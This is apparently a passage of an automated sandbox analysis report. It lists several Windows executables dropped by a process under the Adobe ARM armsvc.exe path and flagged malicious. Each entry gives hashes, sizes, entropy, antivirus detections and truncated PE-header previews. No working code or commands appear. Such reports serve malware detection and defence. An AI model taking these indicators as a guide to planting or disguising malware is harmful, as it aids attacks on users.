                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................!.............................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1628672
                                                                                                                                                                                                                            Entropy (8bit):5.207172499811455
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:tWR5k8hb0Haw+xqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:tWLk8SHawm9JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:8DD8A00A6E4F1339FD74E8C63005B119
                                                                                                                                                                                                                            SHA1:35AF4C492AB04AB5F7C4F7E26193EB643673BA4F
                                                                                                                                                                                                                            SHA-256:8FB200BF65902D6B3724D9FD1E51F2844CAD7259B7FCF81E25C45DB0B33C578F
                                                                                                                                                                                                                            SHA-512:056B94F40CD8736F706BB1EBB3A6F515A8EEF4EE2B15F43CDD7F7D88A1DA84F5E34124F87ED2AB2282D39F8D38155C5135A62EEC7371B020417D9518CF45B650
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.............................P#........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc.......`......................@...........................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1388544
                                                                                                                                                                                                                            Entropy (8bit):4.835909183096476
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:PkCKAB2GJ0eeQ2yPyzc+E7xonyVGc/dT5N:PxKkZJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:D4457BAB67C01CECF69E18D7538C7C8D
                                                                                                                                                                                                                            SHA1:F6D6AA413849E61843801155468591B75B1608FA
                                                                                                                                                                                                                            SHA-256:110FF8C18C1F360C6961DBAB6E234AD376B39775521C24C87344B90011078779
                                                                                                                                                                                                                            SHA-512:9ECB1F5401B6F2A1799B0A31CA7A747F09126A53EB37C4F00F9ADD778F0C43E45FE2107A75826D1E3863863B348D6F9A8F3BB0D2C8146BC1A900E7A013469473
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@..........................p......9.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...............@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1334784
                                                                                                                                                                                                                            Entropy (8bit):4.820873280392928
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:1jNWBP/GJ0eeQ2yPyzc+E7xonyVGc/dT5N:9Nm2JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:3764FD711B116F8E76527A3DD07D9406
                                                                                                                                                                                                                            SHA1:A3EE0F5060F906B7E4BA8B90F99E27551486674B
                                                                                                                                                                                                                            SHA-256:9A3E6C185DE7E5DA6568DE77633FA8A4109DEEA0FC0942E4212AA4938D9D007A
                                                                                                                                                                                                                            SHA-512:518D6D304B20D97CF7952FDEE0F2ACAA0410891068EB4B384327138FBCD4CE9074DCA1F3B9D92357BB22B936A4ECDD09DAC8FB28E9487F6D792E66D7FA8C675E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................f7.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1409024
                                                                                                                                                                                                                            Entropy (8bit):4.913947460705735
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:DijRyhdsRr1GJ0eeQ2yPyzc+E7xonyVGc/dT5N:DijsoRQJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:C327B7CB7819C2CA5B692546DB530FED
                                                                                                                                                                                                                            SHA1:EA1AC523260ABF03A8382B4F4BF13CC4740763EF
                                                                                                                                                                                                                            SHA-256:41BC43E4B2EACF801FA10B4E5E3E7EEA4F5535D97566EC0418B3043C6CB4FADB
                                                                                                                                                                                                                            SHA-512:2911194C17176D50EDA3A3841CEA0529E3E319DE32B8F59CF6D1B0397C76E70E30642CD422D48805D832181947E8A5EF2C822AAA6B1DA3D59F5C150D26DBBB54
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................. ........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc....... ......................@...........................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1448960
                                                                                                                                                                                                                            Entropy (8bit):5.028601533678831
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:i16DmRF+wpx/QafMGJ0eeQ2yPyzc+E7xonyVGc/dT5N:tmRF+wn/JfTJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:B684C0F549854079171954A8CEDB7193
                                                                                                                                                                                                                            SHA1:7667A7390D0CB9F4B892AC3BAD8AF8EFF650C413
                                                                                                                                                                                                                            SHA-256:BD5BD3EBC4D499D099124F5C0DEEF6E9CE4DF7A457289414676F27C0A1E63E11
                                                                                                                                                                                                                            SHA-512:5DDFD8548A9B4495D166C0028DDE2BF78FAE25E777F7D6828035481069D2F918F4A29515DD1481B1EE67017F8032DF7CB0E6EC49B40FF6001098BB877C740C22
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..........................p ......................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1334784
                                                                                                                                                                                                                            Entropy (8bit):4.820847669019373
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:6E21BPqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:b2b1JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:487D180F00FA37D5D4FAA2BF1C2A1675
                                                                                                                                                                                                                            SHA1:3BE46834AB10319938606CD6355EBFF078536154
                                                                                                                                                                                                                            SHA-256:E9585E8243E8B131872B1F7AAD1AE37E271FFAEE07E33F38322C10BCDA6D147B
                                                                                                                                                                                                                            SHA-512:6A54CCE556192D967166302C62768FC35C1826749E57290D55785C48CB4C88D366D2D7A43385B6E2CC2CF1611F0D46991519137182EBF81049D1830326239E33
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................0t.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):105669632
                                                                                                                                                                                                                            Entropy (8bit):7.999988914307437
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:3145728:FLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICUL:lBWx/pt8U7E6aZRfIICUL
                                                                                                                                                                                                                            MD5:6A93568BFDAAC6E5DADFFD9CA584C908
                                                                                                                                                                                                                            SHA1:E18F477627F44BF3ED612844BA62CEF750DC51D0
                                                                                                                                                                                                                            SHA-256:E632F20E923011F7BF773CFDD3C566E42B94AC2B7595237D826D2C81F4358990
                                                                                                                                                                                                                            SHA-512:E3713C1993D80D7938374527F246D22A7DFE478834D37CE171072A7318DEFDC682C2D8E6CCDE8E59B6FDA327911013782D4F1A41FB05C5DDF13F9B737C21B596
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.....j~L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1264640
                                                                                                                                                                                                                            Entropy (8bit):4.712918124068021
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:nGGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:nGGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:D3CA57DAE2D66DCB46B404685BAAE0FA
                                                                                                                                                                                                                            SHA1:1C217E4D33C4708A117B94A08D33E2E5C698023A
                                                                                                                                                                                                                            SHA-256:ED509EF78C538698D34552BFF2A17031569FEEC9CF25330881F7EE94363A7B25
                                                                                                                                                                                                                            SHA-512:FE8AE14A11599A812FC88CAA28EA5304F24A3402F8758FC3CAB5B0779E1E0FF8FF16A945A69E85647C02B428B9F161A1EED87AE409A3D2FF25FC4D3E4778E700
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................V{......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.674817803747707
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:Z2PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:wPGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:52FACBA463CEDF66C092AAF94403740E
                                                                                                                                                                                                                            SHA1:741F206C4F49AD3426963E0FF02B485A4953FCA7
                                                                                                                                                                                                                            SHA-256:F6898EBC2D0CF12A3E1934EF8A54D6E0D1B172465304C9C4B45EB971B65E74EE
                                                                                                                                                                                                                            SHA-512:D1E7A9041ECCC3396A67F631F5CABCFF6B963CB9DD771B6EA6DAC75CA2125AE9FB4480339A33B40E2FEAE2693FEC7F00D22008F0350CD538752C600C5847C469
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1481728
                                                                                                                                                                                                                            Entropy (8bit):5.127098482332526
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:FpwOtO7EGJ0eeQ2yPyzc+E7xonyVGc/dT5N:FmOtmbJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:5387A7BCA447F6A72E643F6186D17D56
                                                                                                                                                                                                                            SHA1:CB48388A110C5918DF11CF4E4553C6C71806C2A0
                                                                                                                                                                                                                            SHA-256:1F4E6B6178C51CFB0E53545194D680B52DC426E0149564E2D20FABD14FAB9369
                                                                                                                                                                                                                            SHA-512:2248D7B8A2A2C23230463A22EA9D51A98D9185149205DB8579C1A52AD700DE2A07D7E3589DEDFEC413A2E4544EA7124B363A898E2F71BBC579C51BD4408DD418
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@........................... .....Jw.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1318912
                                                                                                                                                                                                                            Entropy (8bit):4.7765840457053255
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BF1vvzGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:L1TGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:BB76FD4581AA6ABD0148DD3211AB6CE1
                                                                                                                                                                                                                            SHA1:FBD9A96FFB4DBE278A5793CF562F511A48A4198D
                                                                                                                                                                                                                            SHA-256:A1F0EC5FFC47B502A41A8DD2ED6AD6ED8A40542E0D2F5759EE25981B3446E664
                                                                                                                                                                                                                            SHA-512:D9C357DA152C5D2D92E1F9BB0C58F04695B44075F8955D5FBEA258DB243EF7EEA7E4596163AEAA63FD16D8B2B9B3862EA33E5C275A7F168DD1608130A94AFB7E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..........................P......gp......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1481728
                                                                                                                                                                                                                            Entropy (8bit):5.12779884956594
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:QKU/h/4KBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:Qr/VsJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:28DE42F9A3D44AFF22FBF253D52D2ACD
                                                                                                                                                                                                                            SHA1:8D2AB101F0CF1784B35E9BA6754EA4BFCB79C87F
                                                                                                                                                                                                                            SHA-256:F59E8071188DDAF213DB35C64AFE0FFF7080DE069236673AA010397838A4EAB5
                                                                                                                                                                                                                            SHA-512:2712159E5459CE2CBF5D75E182E8B9BE4621D5B29F1D1BD2D051C1D4A5D05BA9E829218B7306B9F64D4D512395E436BFD58962067BDC0BF0C3D77DFA5E7DF356
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@........................... ..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1620480
                                                                                                                                                                                                                            Entropy (8bit):5.1912946798597
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:Vx7YiBLZ05jNTmJWExgGJ0eeQ2yPyzc+E7xonyVGc/dT5N:VxUiHIjNgXJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:5FACEC067BCCB1D3E0BE10330D833CBB
                                                                                                                                                                                                                            SHA1:D45631CCD801607FD4061D6B59E9EE331A481B12
                                                                                                                                                                                                                            SHA-256:050C63C58F3BF7DE30F64BB5D26CA5CD2CB4317201478AB21A6DF1948B630431
                                                                                                                                                                                                                            SHA-512:9AB9F50056F7A3B093F6F14C69F4B2BF3370A2AA2D4B12893B89E0E5AB79AB2F1D8C2B470F0F4B8BD215525D9E8FEF34E3077F18DF3882782CC14BDC70BE9CB5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................0$.....Q...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675277581389783
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:5orfGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:yTGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:023884942C4CA6F01B2218DE8A8B8BC3
                                                                                                                                                                                                                            SHA1:181610036C415387BEB93012FE1B4CFB7FF8A4CD
                                                                                                                                                                                                                            SHA-256:35542094B4FA223887422F8175E04F77743603797D7A57EB0D7DFED274BC5724
                                                                                                                                                                                                                            SHA-512:3E7B315133A61C8D73180626A0B62AA50E33C936FB537DC7195EA96A271DDE28CDB2C79C632C80F1B2B1871ACC68FABD5102B4272678221FBFBB046D2EE880B2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1348608
                                                                                                                                                                                                                            Entropy (8bit):4.834500747196533
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:VdP/iGJ0eeQ2yPyzc+E7xonyVGc/dT5N:7tJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:CF51F35F0E97CA5E55E28913301A6540
                                                                                                                                                                                                                            SHA1:0CC15616158E4C89AB92F7CDCFFB6DCEAF98B634
                                                                                                                                                                                                                            SHA-256:AD668923CDB8E03B8F3A99ED0C5B5852E48A7BC26BA52F3425F7703078B12800
                                                                                                                                                                                                                            SHA-512:B8C8BEC798E100294ED8D3750325731B8647F6025DCF1D3E5AAD1C5911D2F215EA84BF2A360D4C487CC5914251AF24F593678989288029F72DD9B683D4DC9BF2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@.................................]...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675302568121257
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:hZ5nGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:vhGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:84F8D0A4F78FA6A428D0D9FBC3EDA85D
                                                                                                                                                                                                                            SHA1:BE8AB6916E4F54972E1A70A26D18362B97304981
                                                                                                                                                                                                                            SHA-256:79C1E7DA9C3058811283A6401449D7F8A6FCAE0000309067E3B5B966D28FE134
                                                                                                                                                                                                                            SHA-512:E546EB482B0C98CA1FC7DD5B65623D0F26AB319326417AF370A60204F50B6DF0F5CCC0D3F81896A8BF99421DE9E891BD95F38D98B9BBAFC86111FF482884E4D7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
